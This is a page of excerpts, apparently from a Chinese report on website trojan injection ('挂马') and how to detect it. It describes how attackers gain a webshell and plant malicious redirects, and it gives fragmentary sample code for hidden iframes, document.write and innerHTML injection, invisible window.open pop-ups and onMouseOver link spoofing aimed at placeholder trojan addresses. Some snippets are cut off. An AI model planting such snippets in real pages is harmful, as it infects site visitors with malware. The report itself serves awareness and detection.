网站挂马及检测技术

《网站挂马及检测技术》由会员上传分享，免费在线阅读，更多相关内容在教育资源-天天文库。

1、网站挂马与检测技术报告什么是挂马？所谓的挂马，就是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序0day,等各种方法获得网站管理员账号，然后登陆网站后台，通过数据库备份/恢复或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容，向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP，然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒。网站挂马的危害危害和应用的普及程度有关，上网人人

2、都会，也就是说，人人都可能中毒。据金山毒霸安全实验室统计，每天有数百万次浏览与挂马网页有关，中毒概率在20%-50%之间。很多游戏网站被挂马，黑客目的就是盗取浏览该网站玩家的游戏账号，而那些大型网站被挂马，则是为了搜集大量的肉鸡。网站被挂马不仅会让自己的网站失去信誉，丢失大量客户，也会让我们这些普通用户陷入黑客设下的陷阱，沦为黑客的肉鸡。　　如果不小心进入了已被挂马的网站，则会感染木马病毒，以致丢失大量的宝贵文件资料和账号密码，其危害极大。挂马泛滥的原因利。病毒木马黑色产业链有丰厚的利润，去年南京警方抓获的大

3、小姐系列木马案，犯罪集团3个月获得非常收益3000万。网络应用越普及，黑色产业链的从业者收益也就越高。挂马范围哪些网站容易被挂马呢？越是流量高的网站对黑客越有吸引力，黑客攻破一个管理上有漏洞并且网站流量很高的网站，一天就可以感染数百万人。那些与公共事业密切相关的网站，比如政府机关的网站，色情网站，视频网站，聊天交友网站，提供盗版软件破解工具的网站最容易被入侵，几乎每周出现的热点网络事件都被攻击者利用，网民一不小心就会受热门事件吸引中招。网站挂马的常见方式1.框架挂马

4、ight=0>其中“地址”处可以输入恶意网站链接等。属性为0意味着该框架是不可见的，受害者若不查看源代码很难发现网页木马。这个方法也是挂马最常用的一段代码，但是随着网站管理员和广大网民安全意识的提高，只要在源代码中搜索iframe这个关键字，就很容易找到网页木马的源头。2.js文件挂马只要是JS文件，都可以通过被恶意修改从而被挂上恶意代码，一般被全站引用的JS代码最容易被挂木马，检测我们可以查看JS代码的左边或下边，坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏，所以要多看看JS

5、代码页面有没有被故意拉长等。相比iframe这个标签，这段代码就显得更加隐蔽，因为几乎95%的网页中都会出现类似的script标签。利用js引入网页木马也有多种方法：在js中直接写出框架网页木马示例代码如下：document.write("")；指定language的属性为"JScript.Encode"还可以引入其他扩展名

6、的js代码，这样就更加具有迷惑性，示例代码如下：；利用js更改body的innerHTML属性，引入网页木马如果对内容进行编码的话，不但能绕过杀毒软件的检测，而且增加了解密的难度，示例代码如下：op.document.body.innerHTML=top.document.body.innerHTML+'r

7、%3E%3C/iframe%3E'；利用JavaScript的window.open方法打开一个不可见的新窗口示例代码如下：window.open("网页木马地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");；利用URL欺骗示例代码如下：ahref="http://www.163.com(/

8、迷惑用户的链接地址，显示这个地址指向木马地址)"onMouseOver="www_163_com();returntrue;">页面要显示的正常内容：functionwww_163_com(){varurl="网页木马地址";open(url,"NewWindow","toolbar=no,location=no,directorie